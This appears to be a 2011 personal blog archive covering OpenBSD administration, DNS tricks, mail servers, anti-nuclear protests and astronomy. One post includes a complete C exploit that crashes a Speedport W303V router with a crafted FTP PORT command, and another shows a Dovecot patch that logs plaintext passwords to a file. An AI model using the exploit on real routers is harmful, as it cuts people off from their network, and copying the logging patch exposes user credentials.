res_send.c lines 799-820/853 byte 21458/22096 97%  (press RETURN)

Tonight I read code. The resolver library in OpenBSD, to be more precise. When I do something like this, I'm looking for something... and I think I've found it... you have to have read "The Hitchhiker's Guide to the Galaxy".


traceroute6 clock.centroid.eu

February 18th, 2011

When I'm awake and my computer is on you can traceroute6 clock.centroid.eu and it'll give you the time of day in GMT. Like so:

13  cl-154.muc-02.de.sixxs.net (2001:a60:f000:99::2)  122.742 ms  121.5[36/1981$
3.863 ms
14  cordelia.centroid.eu (2001:a60:f074:4::2)  127.305 ms  128.850 ms  130.404 ms
15  xxx.hello.xxx.centroid.eu (2001:a60:f074:ff::1)  123.780 ms  123.610 ms  123.301 ms
16  xxx.why.xxx.centroid.eu (2001:a60:f074:ff::2)  124.455 ms  126.730 ms  124.904 ms
17  xxx.are.xxx.centroid.eu (2001:a60:f074:ff::3)  131.776 ms  128.739 ms  134.405 ms
18  xxx.you.xxx.centroid.eu (2001:a60:f074:ff::4)  125.209 ms  133.453 ms  128.666 ms
19  xxx.tracerouting6.xxx.centroid.eu (2001:a60:f074:ff::5)  137.000 ms  133.315 ms  143.594 ms
20  the-time-is-15-41-02-in-gmt.clock.centroid.eu (2001:a60:f074:fe::dc8e)  138.899 ms  141.519 ms  145.045 ms
21  dione.centroid.eu (2001:a60:f074::30)  123.835 ms  125.093 ms  123.141 ms

The code for this was actually pretty simple; it only required putting 86400 reverse DNS entries into my name server, which bloated it by about 60 megabytes, but it's worth it I think. It does not work for traceroutes that work with ICMP nor for traceroutes that require forward and reverse to match.
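
The 86400 reverse entries described above can be generated mechanically. The following is an added example, not the code used for this blog: it reads the address layout off hop 20 in the sample output (0xdc8e is 15:41:02 expressed as seconds since midnight) and emits one ip6.arpa PTR record per second in generic zone-file syntax. The function names are made up for the example, and the carry into the next 16-bit group for seconds above 0xffff is an assumption.

```c
#include <stdio.h>
#include <string.h>

#define SECS_PER_DAY 86400u

/* Upper 64 bits of the clock addresses, read off hop 20 in the post
 * (2001:a60:f074:fe::dc8e). */
static const unsigned char CLOCK_PREFIX[8] = {
	0x20, 0x01, 0x0a, 0x60, 0xf0, 0x74, 0x00, 0xfe
};

/*
 * Address for one second of the day. 0xdc8e == 15*3600 + 41*60 + 2, so the
 * sample shows the second count in the low bits. Assumption: counts above
 * 0xffff carry into the next 16-bit group (86399 == 0x1517f).
 */
int
clock_addr(unsigned int sec, unsigned char addr[16])
{
	if (sec >= SECS_PER_DAY)
		return -1;
	memset(addr, 0, 16);
	memcpy(addr, CLOCK_PREFIX, sizeof(CLOCK_PREFIX));
	addr[13] = (sec >> 16) & 0xff;
	addr[14] = (sec >> 8) & 0xff;
	addr[15] = sec & 0xff;
	return 0;
}

/*
 * ip6.arpa owner name: all 32 nibbles of the address, least significant
 * first, each followed by a dot.
 */
int
reverse_name(const unsigned char addr[16], char *buf, size_t len)
{
	static const char hex[] = "0123456789abcdef";
	char *p = buf;
	int i;

	if (len < 32 * 2 + sizeof("ip6.arpa."))
		return -1;
	for (i = 15; i >= 0; i--) {
		*p++ = hex[addr[i] & 0x0f];
		*p++ = '.';
		*p++ = hex[addr[i] >> 4];
		*p++ = '.';
	}
	memcpy(p, "ip6.arpa.", sizeof("ip6.arpa."));
	return 0;
}

/*
 * One PTR record in zone-file syntax, or NULL if sec is out of range.
 * Returns a pointer to static storage that the next call overwrites.
 */
const char *
clock_ptr_record(unsigned int sec)
{
	static char line[192];
	unsigned char addr[16];
	char owner[80];
	int n;

	if (clock_addr(sec, addr) != 0 ||
	    reverse_name(addr, owner, sizeof(owner)) != 0)
		return NULL;
	n = snprintf(line, sizeof(line),
	    "%s IN PTR the-time-is-%02u-%02u-%02u-in-gmt.clock.centroid.eu.",
	    owner, sec / 3600, (sec / 60) % 60, sec % 60);
	if (n < 0 || (size_t)n >= sizeof(line))
		return NULL;
	return line;
}

int
main(void)
{
	unsigned int sec;

	/* 86400 lines: one PTR record per second of the day. */
	for (sec = 0; sec < SECS_PER_DAY; sec++)
		puts(clock_ptr_record(sec));
	return 0;
}
```

Only PTR records are produced, with no matching AAAA records, which is why a traceroute that insists on forward and reverse agreeing will not show these names.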


Random Hackepedia

February 18th, 2011

The RH for this week is shared memory.


Playing with Constellations

February 27th, 2011


A compilation of the great Carl Sagan

March 4th, 2011

I found this video on YouTube. It's snippets from Carl Sagan, a cosmologist and legend. It's worth being linked from this blog. Originally at YouTube.


Upgrading postfix on OpenBSD 4.8

March 8th, 2011

A plaintext injection attack has become known to exist in old versions of postfix. OpenBSD's postfix in the ports was outdated at version 2.7.1. What I did was I downloaded version 2.7.3 and stuck that into the /usr/ports/distfiles/postfix/ directory. Then I went to work in /usr/ports/mail/postfix/stable editing the Makefile first to say 2.7.3 and not 2.7.1, then I built the new postfix with:

 NO_CHECKSUM=Yes FLAVOR=SASL2 make
 NO_CHECKSUM=Yes FLAVOR=SASL2 make package

So then I had the package. I stopped postfix on uranus and deleted it with a cd /var/db/pkg && pkg_delete postfix-2.7.1-sasl2, then I installed the package with pkg_add postfix-2.7.3-sasl2.tgz and started postfix with /usr/local/sbin/postfix start. It worked and so far no complaints.

It's nice that the port allowed me to do this, had there been many patches that conflict I wouldn't have been able to do this through the ports system. Thanks to arno for coaxing me to do it instead of lazily waiting for a new port.

A hole in postfix has been fixed. OpenBSD's postfix from the ports was too old at version 2.7.1. What I did was download version 2.7.3 and put it into /usr/ports/distfiles/postfix/. Then I started editing the port Makefile in /usr/ports/mail/postfix/stable so that it now said 2.7.3 and not 2.7.1. Then I built the port like so:

NO_CHECKSUM=Yes FLAVOR=SASL2 make
NO_CHECKSUM=Yes FLAVOR=SASL2 make package

Then I had the package. I stopped postfix on uranus and deleted it with cd /var/db/pkg && pkg_delete postfix-2.7.1-sasl2. Then I installed the new package with pkg_add postfix-2.7.3-sasl2.tgz and started postfix with /usr/local/sbin/postfix start. It worked and so far no complaints.

It's nice that the port allowed this.


We don't need it!

March 12th, 2011

I'm typing about nuclear power, I don't need it and my folks would agree. We don't need it. The recent meltdown in Fukushima shows how easy a disaster is waiting to happen. It's like the saying goes "you play with fire, you gonn' get burned" and the question is not if we'll get burned but when. Everybody line up, your turn is in the future, unless this madness ends!

I'm talking about nuclear power. I don't need it and my family would agree with me. We don't need it. The meltdown in Fukushima shows how easily a worst-case accident can happen. It's like the English saying, "you play with fire, you gonn' get burned", and the question is not whether we'll burn ourselves on it but when. Everyone get in line, our turn comes in the future, unless this madness comes to an end.


VPS hacked and goodbyes to proteus

March 12th, 2011

I discontinued my vps proteus.solarscale.de a few months ago but I still had it in possession until tomorrow. What I did was install other OS's on it to test it. So I installed Debian 5.0 LAMP - 64 bit on it and left it like that a few days. The apt-get system was broken due to bad checksums so I couldn't update it. So what happened was that a hacker got in through the exim mail service. He installed a perl script that would connect to an IRC server that I never heard of before, probably a part of a botnet. I traced the process for a few minutes and then reinstalled the VPS with a minimal OpenSuse 10.3 that I had in there before too. It doesn't have a mail server running and only exposed daemon is sshd which is likely OK. Well so much for my venturing, you see dangers everywhere. I just hope that he didn't spam with this vps because it was visibly still in my dns domain (which I've taken off now). Well this is the end for proteus. It was my trusted vps for 3+ years and it's going now. Goodbye good machine.

I gave up my VPS proteus.solarscale.de a few months ago, but I still had it under my control until tomorrow. What I did was install a different operating system on it to test it. So I installed Debian 5.0 LAMP - 64 bit on it and left it like that for a few days. A hacker then made himself nicely at home in my VPS; he came in through the "exim" mail service. He had installed a perl script that opened a connection to an IRC server; it was probably a zombie for a botnet. I traced the process a bit but didn't find out much more, and then I reinstalled the old OS, which was more secure (OpenSuse 10.3). It has no mail service and only the SSH service is on, so it's probably more secure. So those were my experiences; there is danger everywhere. I just hope he didn't spam with my domain. So that was proteus, and proteus comes to an end today. Goodbye good machine!


Equinox Nigh

March 19th, 2011

The March Equinox is upon us again, tomorrow. This also means the first day of spring. Hooray!

The March equinox is here. Tomorrow. That also means the first day of spring.

Check out other analemmas at APOD.


OpenBSD 4.9 pre-ordered

March 20th, 2011

I've pre-ordered OpenBSD 4.9.

I have pre-ordered OpenBSD 4.9.



Blog continues to forget

March 25th, 2011

This blog continues to forget on a monthly basis...

This blog just won't stop forgetting..

Wildcarddnsd with authpf May 2nd, 2009
Random Hackepedia May 1st, 2009
Solaris 10, configuring IPv6 April 30th, 2009
OpenBSD donation April 30th, 2009
Random Hackepedia April 23rd, 2009
Postfix Message Limit April 20th, 2009
Random Hackepedia April 18th, 2009
Mail with spam protection April 14th, 2009
RFC 2460 Reading change April 2nd, 2009
Happy Equinox!  March 19th, 2009

Dovecot+OpenBSD+bsdauth+Apple Mail considered harmful?

April 4th, 2011

When I turned off proteus.solarscale.de as my primary mailserver I gave that functionality to uranus.centroid.eu. The difference was that proteus was Linux and uranus is OpenBSD. My parents have an email account that is on uranus and my dad checks this with Apple Mail.

Every once in a while he'd get an authentication error and Apple Mail would pop up a box asking for his password. I insisted it was Apple Mail since there could possibly be nothing wrong with Dovecot on OpenBSD. Eventually it became very bad or I came to doubt my first insistence. So what I did was create a small patch for Dovecot to check the password sent by Dovecot. I couldn't do this with a sniffer because it is SSL encrypted over the Internet.

        fd = open("/tmp/.popraw", O_APPEND | O_CREAT | O_WRONLY, 0600);
        if (fd != -1) {
                write(fd, plain_login->data, plain_login->used);
                write(fd, "\n", 1);
                close(fd);
        }

The patch just logged the password and username being used in Dovecot's chrooted directory hierarchy in /var. With this I saw that the password was OK when dovecot would deny my dad's POP3 query. And dovecot would log this message:

Mar 27 17:45:09 uranus dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=, method=PLAIN, rip=XX.XX.XX.210, lip=212.114.251.91, TLS

I then switched, in dovecot's .conf file, the passdb bsdauth {} entry to be passdb passwd {} and it has been running fine for the last 5 days. I'm confident that this was the problem and that the bsdauth mechanism is broken on OpenBSD ever so slightly. I'm not going to chase this bug since there is a workaround and I'm mega lazy, but I want you to know that this bug exists.

auth default {
        mechanisms = plain 

        userdb passwd {
                args = blocking=yes
        }
#  passdb bsdauth {
#   # [cache_key=] - See cache_key in PAM for explanation.
#    #args =
# }

        passdb passwd { 
                args = blocking=yes
        }
}


CKLN 88.1 off Air

April 17th, 2011

The small Toronto radio station CKLN 88.1 isn't broadcasting on the FM dial anymore. What remains is an mp3 stream from the station's studios. Ron Nelson said on the Reggaemania show that the format of the station may continue as an mp3 stream format. It's unfortunate for the station but a sign of the (digital) times; some people were able to tune in from their blackberries through the radio stream before, and that's the future I guess. Here is the CKLN website for more information.

Toronto's small radio station CKLN 88.1 no longer broadcasts on FM. Listening to it is now only possible via MP3. Ron Nelson said on the Reggaemania show that the format will probably stay with mp3 streaming. It's too bad for the station but a sign of the (digital) times; the future is probably listening to CKLN through a Blackberry smartphone, which after all also goes over radio.


Wildcarddnsd at BETA_6

April 19th, 2011

Well, I've tagged wildcarddnsd to version BETA_6 and branched BETA_6STABLE. You can download wildcarddnsd there. Here is a list of what changed between April 7th of last year and today:

It seems that I'm doing a BETA release every year or so. I'm getting a bit of help from mjbrune these days and will see if he can hack the C code too. All in all I'd like more people to help in, help is needed in the recursive code logic. Maybe it'll be fixed by next year, maybe not, who knows. :-)


Thoughts about CKLN.FM

April 21st, 2011

Since CKLN lost their 88.1FM frequency they have been going on as an online radio station; listen in here. Perhaps in a few years when digital radio comes out in Canada, a chance to get back to the airwaves will present itself again. And I think if CKLN keeps up their "way" they'll get back on the airwaves. With digital radio there are a lot more channels and better range and quality. The ckln.fm online format is a step in that direction. Analog is on its way out, and it shows how opportunistic this was by CRTC's decision to cut CKLN off. I'll still enjoy listening from Germany via the Internet.


Atomkraft, Nein Danke!

April 26th, 2011

Yesterday I cycled roughly 19 kilometers to and from the nuclear power plant Grafenrheinfeld, to protest against nuclear power and to pay my respects to the anniversary of the Chernobyl disaster in the Ukraine. There were about 15,000 people there although we felt it was only 5k to 10k at most. My argument is that Germany is capable of replacing nuclear power with alternative energies. We need this nuclear abandonment. We're all very scared that a Chernobyl or Fukushima could happen here in Germany.

Yesterday I cycled roughly 19 kilometers to the Grafenrheinfeld nuclear power plant and back. I protested against nuclear power and was there to remember the Chernobyl disaster. There were roughly 15,000 people there with me, but we estimated that it was only 5K to 10K. My argument against nuclear power is that Germany is capable of replacing nuclear power with alternative energies. We need this nuclear phase-out. We are all afraid that Chernobyl or Fukushima could happen here in Germany.

PS. I should probably also say that this demonstration was historic for me. I attended a demonstration as a boy in 1981 near the very same spot, 30 years of protests. Here is an old photo of a demo:


Upgraded to OpenBSD 4.9

April 29th, 2011

Well I could have waited 2 days for packages to be available but I couldn't wait. I installed OpenBSD 4.9, which I got in the mail yesterday from pre-orders, and installed it on cupid.centroid.eu (IPv6). Then I built packages for uranus; it didn't take long and I was ready to binary upgrade uranus. Everything went well except mailman had a problem, which was solved by editing the FLAVOR section of mailman's Makefile. Most ports upgraded very well and easily with a mere cd /var/db/pkg; pkg_add -u *. Anyhow here is the uname for uranus:

$ uname -a
OpenBSD uranus.centroid.eu 4.9 GENERIC.MP#794 i386

I'm excited that I have 4.9 running in production 2 days before everyone else can download it. Pre-orders rock! Get your CD!


Uranus boots Uranus (with the heart of Saturn)

April 30th, 2011

One of the features I waited for in OpenBSD 4.9 was Wake-On-LAN. This allows a program on OpenBSD 4.9 to boot another computer simply by running arp -W MACADDRESS Interface. I could have done the wake on LAN feature with codeblue but with OpenBSD 4.9 I didn't have to use it. So I have it booting Uranus (with the heart of Saturn) every morning at 9AM. It'll serve as an alarm clock too.

Why is it called uranus with the heart of saturn? Because it should really be called saturn but I'm afraid that vmware workstation will cease to work when I change the hostname in linux.



Ordered two books on PHP

May 8th, 2011

I've ordered two books on PHP from amazon.de. Should be wicked!

I've ordered two books about PHP from amazon.de. Should be great!



Blog sees changes

May 14th, 2011

I've changed the blog. Maneuvering to individual articles should be easier now and an article can be entered completely, probably making Google caching easier. We'll see. Also changed is that you can now read the blog by clicking next or previous at the top or bottom. You can also find articles quicker I believe. This article is also a test.



SGU will be missed

May 19th, 2011

Sorta too bad the show is over now...



Found a bug in dspam

May 20th, 2011

At work I found a bug in dspam which caused the daemon to be killed on a SIGFPE. Here is the link.



One t(w)o Four, a time to chill

May 21st, 2011

When I grew up in Stratford, Ontario I became infatuated with Hip Hop. I dressed like I thought a rapper would dress and my friends all listened to Hip Hop as well. We were a small group called "the rappers". It was isolating but we couldn't hold back our faith. I longed for more. I needed to move to the big city to live Hip Hop. *chuckle* So in 1994 me and a friend moved to Toronto to take part in the Hip Hop scene there. We visited clubs and bars to see acts that came through the city and then there were Saturdays. From 1PM to 4PM we listened to the Powermove show on CKLN 88.1FM. This spot was perfect and a time to chill on a Saturday afternoon. I have fond memories of listening to MC battles conducted over telephone call-ins. One in particular still stands out in my mind, when one person won a battle when he rapped about his bike with a banana seat. I loved those times then.

On February 12th, 2011 CKLN 88.1FM had a tribute to all the shows that played on the 1-4PM timeslot. This was a historic show and many blogs and media outlets picked up on it, here are some:

I also listened to this show and even taped it. You can check it out here.

Today 88.1FM doesn't exist anymore, only as an online radio station at ckln.fm and for some reason the 1-4 spot has no more mixtape massacre. This is too bad, and people in Toronto who listened to 88.1FM have lost a great pillar that upheld hip-hop in TO. Well that's all I wanted to blog about today.



Does it have honour? What about minimum wage?

May 27th, 2011

I'm back working. The welfare office gave me work to do. Had I refused it they would have sanctioned my welfare. This sorta makes me mad. But what gets me right mad is that the work is for 1.50 euros an hour. Is there any honour left in this system? I feel deeply disappointed.

I'm working again. The Jobcenter arranged work for me. If I hadn't taken it, my money would have been cut. That makes me a bit angry. But what really angers me is that this work is for 1.50 euros an hour. Is there still such a thing as "honour" in this system? I feel very disappointed in the system.



Hello Hal!

May 27th, 2011

I did what I noticed some major newspapers (globeandmail.com) have done. Every 30 seconds or so a javascript program refreshes the blue eye on the bottom right corner. This is to show me that someone who is looking at my blog is "alive" or human. This may seem invasive but I'm interested in how long a human looks at my blog, but I'm unsure how to read the logs for that yet. At least I'm collecting the data. Sorry if it creeps you out.

I did what some online newspapers do (globeandmail.com). Every 30 seconds a JavaScript program refreshes the blue eye at the bottom right. This shows me whether someone reading my blog is alive or human. Perhaps this is taken as an invasion of privacy, but I'm interested in how long a person reads my blog; I don't know how to read the logs for that. In any case I'm collecting the data. Sorry if it bothers you.



OpenBSD 5.0 with or without a browser in AMD64?

June 2nd, 2011

A new awesome function in OpenBSD-current breaks software that is written on 32 bit operating systems. In a mail by Marc Espie to the OpenBSD misc@ mailing list he says:

Not surprisingly, a lot of software that claims to be 64 bits-ready isn't. This touches all web navigators, most jit engines, and probably lots more of software (our ports tree version of gnu-grep, for instance).

He goes on to say: So, a lot of developers are hard at work figuring the problems, getting the word upstream.

So further in the thread Theo de Raadt dug up some stuff that Linux is using, particularly a flag in mmap that forces 64 bit kernels to only allocate in the low 32 bits for its programs. Like Theo said, this is sickening.

Later I wrote asking what the OpenBSD community would do if the browsers can't be fixed in time for the 5.0 release. Because that's what it comes down to for me. When I boot my OpenBSD/amd64 vm instance "dione" I log into X and open usually 1 or 2 xterms and firefox. I do most of my surfing on OpenBSD and only when I need flash do I change to another operating system such as Windows 7. This habit may be in danger here, if the firefox mozilla team can't fix their software in time for the 5.0 release. I have some experience with getting programs fixed "upstream" and not always is there willingness to fix what is wrong out of whatever reason.

So for me, this means relax and sit back and wait. It's unlikely OpenBSD can bundle a browser with their software in time for 5.0 and we may have to go without one in the amd64 platform. Or perhaps the fixes for mozilla are trivial and I'm worried over nothing. But this makes a good writeup for my blog :-).



Cleaning heatsink reduces CPU temperature

June 2nd, 2011

My apartment isn't the cleanest place on earth. So it happens that dust accumulates inside the computer case and eventually gets into the fans and heatsinks. Today was one of those days where the CPU fan could not cool the CPU sufficiently anymore and the box overheated. I had a hard time connecting this heatsink to the CPU; the first time I musta done it wrong and the CPU overheated very quickly. The second time I watched the temperature in the BIOS hardware monitor for 15 minutes and last I saw it at 48.5 degrees Celsius. Still fairly high considering the fan was at 2200 RPM. But I felt that this was better than the 70's that it was at earlier. I do wonder whether a liquid cooling system is better for my setup.



Bought a book on Windows System programming

June 5th, 2011

This is the book that I purchased. I'm hoping to learn a bit about the Windows system. I can use that knowledge to better my understanding of how OS's work in general.



Speedport W303V crashes on PORT FTP command

June 13th, 2011

My parents have a Speedport W303V router bought from T-Home as they are a Telekom customer. I was playing around with FreeBSD today and noticed that whenever I'd ftp something the router would crash. So I tcpdumped it and produced this exploit that crashes this router.

/* speedzap.c by pbug
 *
 * This program crashes a T-Home Speedport W 303V router 
 * with firmware version 1.09.000
 *
 * The router is not even touched, an FTP PORT command is sent with an
 * IP that is not in the address range given out by this router.
 *
 * Some proxy inside the router must cause it to give up and become 
 * unreachable.
 *
 * cc -o speedzap speedzap.c ; ./speedzap
 *
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>	/* inet_addr() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>	/* read(), write(), close() */

#define FTPSERVER "213.83.42.56"
#define FTPPORT	21
#define BYEBYE "PORT 10,0,2,15,167,140\r\n"

int
main(void)
{
	struct sockaddr_in sin;
	int so;
	char buf[512];


	so = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (so < 0) {
		perror("socket");
		exit(1);
	}

	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_port = htons(FTPPORT);
	sin.sin_addr.s_addr = inet_addr(FTPSERVER);
	if (connect(so, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
		perror("connect");
		exit(1);
	}

	read(so, buf, sizeof(buf));
	write(so, BYEBYE, strlen(BYEBYE));
	
	printf("zapped, restart your router.\n");

	close(so);

	exit(0);
}

The program is intended for educational use, to show how badly some proxy functions built into routers are implemented.
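
What an FTP-aware NAT helper or server can do with a PORT argument before acting on it, as an added example (not code from this post or from the router's firmware, whose real logic is unknown): parse the six fields strictly and compare the address with the peer of the control connection. The function names and the 192.168.2.100 LAN client address are assumptions made up for the example.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum port_verdict {
	PORT_OK = 0,		/* well formed, address is the control peer */
	PORT_MALFORMED,		/* not "PORT h1,h2,h3,h4,p1,p2\r\n" */
	PORT_FOREIGN_ADDR,	/* address differs from the control peer */
	PORT_PRIVILEGED		/* data port below 1024 */
};

struct port_arg {
	uint32_t addr;		/* host byte order */
	uint16_t port;
};

/* Case-insensitive match of the "PORT " verb. */
static int
has_port_verb(const char *line)
{
	const char *v = "PORT ";

	for (; *v != '\0'; v++, line++)
		if (toupper((unsigned char)*line) != *v)
			return 0;
	return 1;
}

/* One decimal field, 1 to 3 digits, value 0..255. Advances *pp. */
static int
parse_octet(const char **pp, unsigned int *out)
{
	const char *p = *pp;
	unsigned int v = 0;
	int n = 0;

	while (n < 3 && isdigit((unsigned char)*p)) {
		v = v * 10 + (unsigned int)(*p - '0');
		p++;
		n++;
	}
	if (n == 0 || v > 255 || isdigit((unsigned char)*p))
		return -1;
	*pp = p;
	*out = v;
	return 0;
}

/*
 * Validate one PORT line against the address the control connection came
 * from. A helper that gets anything but PORT_OK should leave the command
 * alone (or refuse it) instead of rewriting it. RFC 2577 recommends the
 * same two checks, third-party address and port below 1024, for servers.
 */
enum port_verdict
check_port_cmd(const char *line, uint32_t client_addr, struct port_arg *out)
{
	unsigned int f[6];
	const char *p = line;
	int i;

	if (!has_port_verb(p))
		return PORT_MALFORMED;
	p += 5;
	for (i = 0; i < 6; i++) {
		if (parse_octet(&p, &f[i]) != 0)
			return PORT_MALFORMED;
		if (i < 5) {
			if (*p != ',')
				return PORT_MALFORMED;
			p++;
		}
	}
	if (strcmp(p, "\r\n") != 0)
		return PORT_MALFORMED;

	out->addr = ((uint32_t)f[0] << 24) | ((uint32_t)f[1] << 16) |
	    ((uint32_t)f[2] << 8) | (uint32_t)f[3];
	out->port = (uint16_t)((f[4] << 8) | f[5]);

	if (out->addr != client_addr)
		return PORT_FOREIGN_ADDR;
	if (out->port < 1024)
		return PORT_PRIVILEGED;
	return PORT_OK;
}

int
main(void)
{
	/* Constructed: a LAN client at 192.168.2.100 sends the post's line. */
	const uint32_t lan_client = 0xC0A80264u;
	struct port_arg a;
	enum port_verdict v;

	v = check_port_cmd("PORT 10,0,2,15,167,140\r\n", lan_client, &a);
	printf("verdict=%d port=%u\n", (int)v, (unsigned int)a.port);
	return 0;
}
```

With the line from speedzap.c and a control peer that is not 10.0.2.15, the verdict is PORT_FOREIGN_ADDR, the case the post describes as an IP outside the range the router hands out.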



Update on Speedport W303V crash

June 18th, 2011

The particular router is a Type A machine; two models exist, Type A and Type B. I called the Telekom yesterday and told them the problem and they had me put the default settings back on the router after backing up the settings and try again. NO GO. The firmware is the latest released and all we can hope for is another firmware patch. This router is beyond broken and I can't continue to FTP stuff like FreeBSD ezjail stuff on virtualbox. The tech at the Telekom said we could exchange the router but we weren't on warranty anymore. This is like an 80 euro router... so we left it at that. I came out empty handed.



Solstice in three days

June 18th, 2011

The June Solstice is in three days. This means summer in the northern hemisphere and winter in the southern hemisphere.



My second Windows program

June 25th, 2011

Since I got my windows system programming book I've been toiling with a program on windows. The first program was a hello, world program and this is the second program.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tchar.h>

int find(TCHAR *filename, TCHAR *buf, TCHAR *);

int
_tmain(int argc, char *argv[])
{
        TCHAR buf[MAX_PATH + 1];
        TCHAR filename[MAX_PATH + 1];

        if (argc == 1) {
                printf("enter filename to find:\n");
                fgets(filename, sizeof(filename), stdin);

                if (filename[strlen(filename) - 1] == '\n')
                        filename[strlen(filename) - 1] = '\0';
                if (filename[strlen(filename) - 1] == '\r')
                        filename[strlen(filename) - 1] = '\0';

                printf("enter directory to start search:\n");
                fgets(buf, sizeof(buf), stdin);

                if (buf[strlen(buf) - 1] == '\n')
                        buf[strlen(buf) - 1] = '\0';
                if (buf[strlen(buf) - 1] == '\r')
                        buf[strlen(buf) - 1] = '\0';

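                if (buf[strlen(buf) - 1] != '\\') {
                        /* the bound is the space left in buf, not its size */
                        strncat(buf, "\\", sizeof(buf) - strlen(buf) - 1);
                }
        } else {
                /* arguments are not parsed, so the buffers would be unset */
                printf("run without arguments\n");
                return(1);
        }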
        
        find(filename, buf, buf);
        printf("find done.\n");
        
        fgets(buf, sizeof(buf), stdin);
        return(0);
}

int
find(TCHAR *filename, TCHAR *buf, TCHAR *samefile)
{
        TCHAR newbuf[MAX_PATH + 1];
        HANDLE myH;
        WIN32_FIND_DATA fd;
        DWORD fType;
        

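        /* buf ends in a backslash; "*" lists everything in that directory */
        if (strlen(buf) + 1 > MAX_PATH)
                return (0);
        strcat(buf, "*");

        myH = FindFirstFile(buf, &fd);
        if (myH == INVALID_HANDLE_VALUE)
                return (0);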

        do {
                if (strcmp(fd.cFileName, filename) == 0) {
                                
                                strncpy(newbuf, buf, MAX_PATH);
                                newbuf[MAX_PATH] = '\0';
                                /* cut the trailing "*" before appending the name */
                                newbuf[strlen(newbuf) - 1] = '\0';
                                strncat(newbuf, fd.cFileName, MAX_PATH - strlen(newbuf));

                                _tprintf(_T("%s\n"), newbuf);
                }

                if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {

                        if (strcmp(fd.cFileName, samefile) == 0)
                                        continue;

                        if (strcmp(fd.cFileName, ".") == 0 ||
                                        strcmp(fd.cFileName, "..") == 0)
                                                continue;
                        
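                        strncpy(newbuf, buf, MAX_PATH);
                        newbuf[MAX_PATH] = '\0';
                        newbuf[strlen(newbuf) - 1] = '\0';
                        /* strncat's bound is the room left in newbuf */
                        strncat(newbuf, fd.cFileName, MAX_PATH - strlen(newbuf));
                        strncat(newbuf, "\\", MAX_PATH - strlen(newbuf));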

                        if (find(filename, newbuf, fd.cFileName) == 1)
                                        break;

                }
        
        } while (FindNextFile(myH, &fd));
        FindClose(myH);

        return (0);
}
The program requires one to press enter at the end when the finding is done which is a feature I put in for the Visual C++ Express program when one debugs it so that the cmd screen stays open. What the program does is similar to UNIX's find(1), although this implementation is more like a joke. Notice one has to use "*" to list contents in a path. yikes.



Syncing clock on OpenBSD/VMware Workstation

June 29th, 2011

I recently synced all my clocks on OpenBSD vm's using the vmt(4) timedelta sensor that is included in OpenBSD 4.9.

tail -f /var/log/daemon ...
Jun 29 19:02:23 cupid ntpd[18033]: adjusting local clock by -0.275138s
Jun 29 19:03:54 cupid ntpd[16677]: clock is now synced
^C
# grep -v ^# /etc/ntpd.conf|grep sensor 
sensor vmt0
That's all that's needed in the config for ntpd to run on the vm.



My third Windows program, speedport exploit

June 30th, 2011

With help from someone I managed to compile my exploit that crashes the Speedport W303V type A router. The .exe is executed from Windows 7 cmd window.

MD5 (speedport_exploit.exe) = 9eb9f16e64feaa8ccd316b9ca51c93c1

I'm gonna try it from my parents house some time and see if it really does crash the router. :-).

Update: it works at my parents house with windows XP. My mom wanted to know why I was making this and what my goal is. My goal is to get a firmware patch out of this from the manufacturer, so that I can continue the legit operations that this uses for a freebsd ezjail install.



Ordered two new books

July 4th, 2011

I've ordered two new books. Now that I'm working hard it's time to reap the benefits to furthering myself. The one is the book you see in the image and the other is a book on javascript. I'm hoping to better my website with javascript eventually.

So what happened to my UNIX love, now that I'm ordering Windows books you may ask? It's still there but I'd like to explore other possibilities and windows is pretty mainstream. I'm toying with the thought of porting wildcarddnsd to windows. All in good time, if ever.



Constellation Name Abbreviations

July 8th, 2011

I got this out of the program xephem which lists 89 constellations:

And:  Andromeda         Cyg:  Cygnus            Pav:  Pavo
Ant:  Antlia            Del:  Delphinus         Peg:  Pegasus
Aps:  Apus              Dor:  Dorado            Per:  Perseus
Aql:  Aquila            Dra:  Draco             Phe:  Phoenix
Aqr:  Aquarius          Equ:  Equuleus          Pic:  Pictor
Ara:  Ara               Eri:  Eridanus          PsA:  Piscis  Austrinus
Ari:  Aries             For:  Fornax            Psc:  Pisces
Aur:  Auriga            Gem:  Gemini            Pup:  Puppis
Boo:  Bootes            Gru:  Grus              Pyx:  Pyxis
CMa:  Canis  Major      Her:  Hercules          Ret:  Reticulum
CMi:  Canis  Minor      Hor:  Horologium        Scl:  Sculptor
CVn:  Canes  Venatici   Hya:  Hydra             Sco:  Scorpius
Cae:  Caelum            Hyi:  Hydrus            Sct:  Scutum
Cam:  Camelopardalis    Ind:  Indus             Se1:  Serpens  Caput
Cap:  Capricornus       LMi:  Leo  Minor        Sex:  Sextans
Car:  Carina            Lac:  Lacerta           Sge:  Sagitta
Cas:  Cassiopeia        Leo:  Leo               Sgr:  Sagittarius
Cen:  Centaurus         Lep:  Lepus             Tau:  Taurus
Cep:  Cepheus           Lib:  Libra             Tel:  Telescopium
Cet:  Cetus             Lup:  Lupus             TrA:  Triangulum  Austral
Cha:  Chamaeleon        Lyn:  Lynx              Tri:  Triangulum
Cir:  Circinus          Lyr:  Lyra              Tuc:  Tucana
Cnc:  Cancer            Men:  Mensa             UMa:  Ursa  Major
Col:  Columba           Mic:  Microscopium      UMi:  Ursa  Minor
Com:  Coma  Berenices   Mon:  Monoceros         Vel:  Vela
CrA:  Corona  Australis Mus:  Musca             Vir:  Virgo
CrB:  Corona  Borealis  Nor:  Norma             Vol:  Volans
Crt:  Crater            Oct:  Octans            Vul:  Vulpecula
Cru:  Crux              Oph:  Ophiuchus         Se2:  Serpens  Cauda
Crv:  Corvus            Ori:  Orion



End of an era, on to the next...

July 22nd, 2011

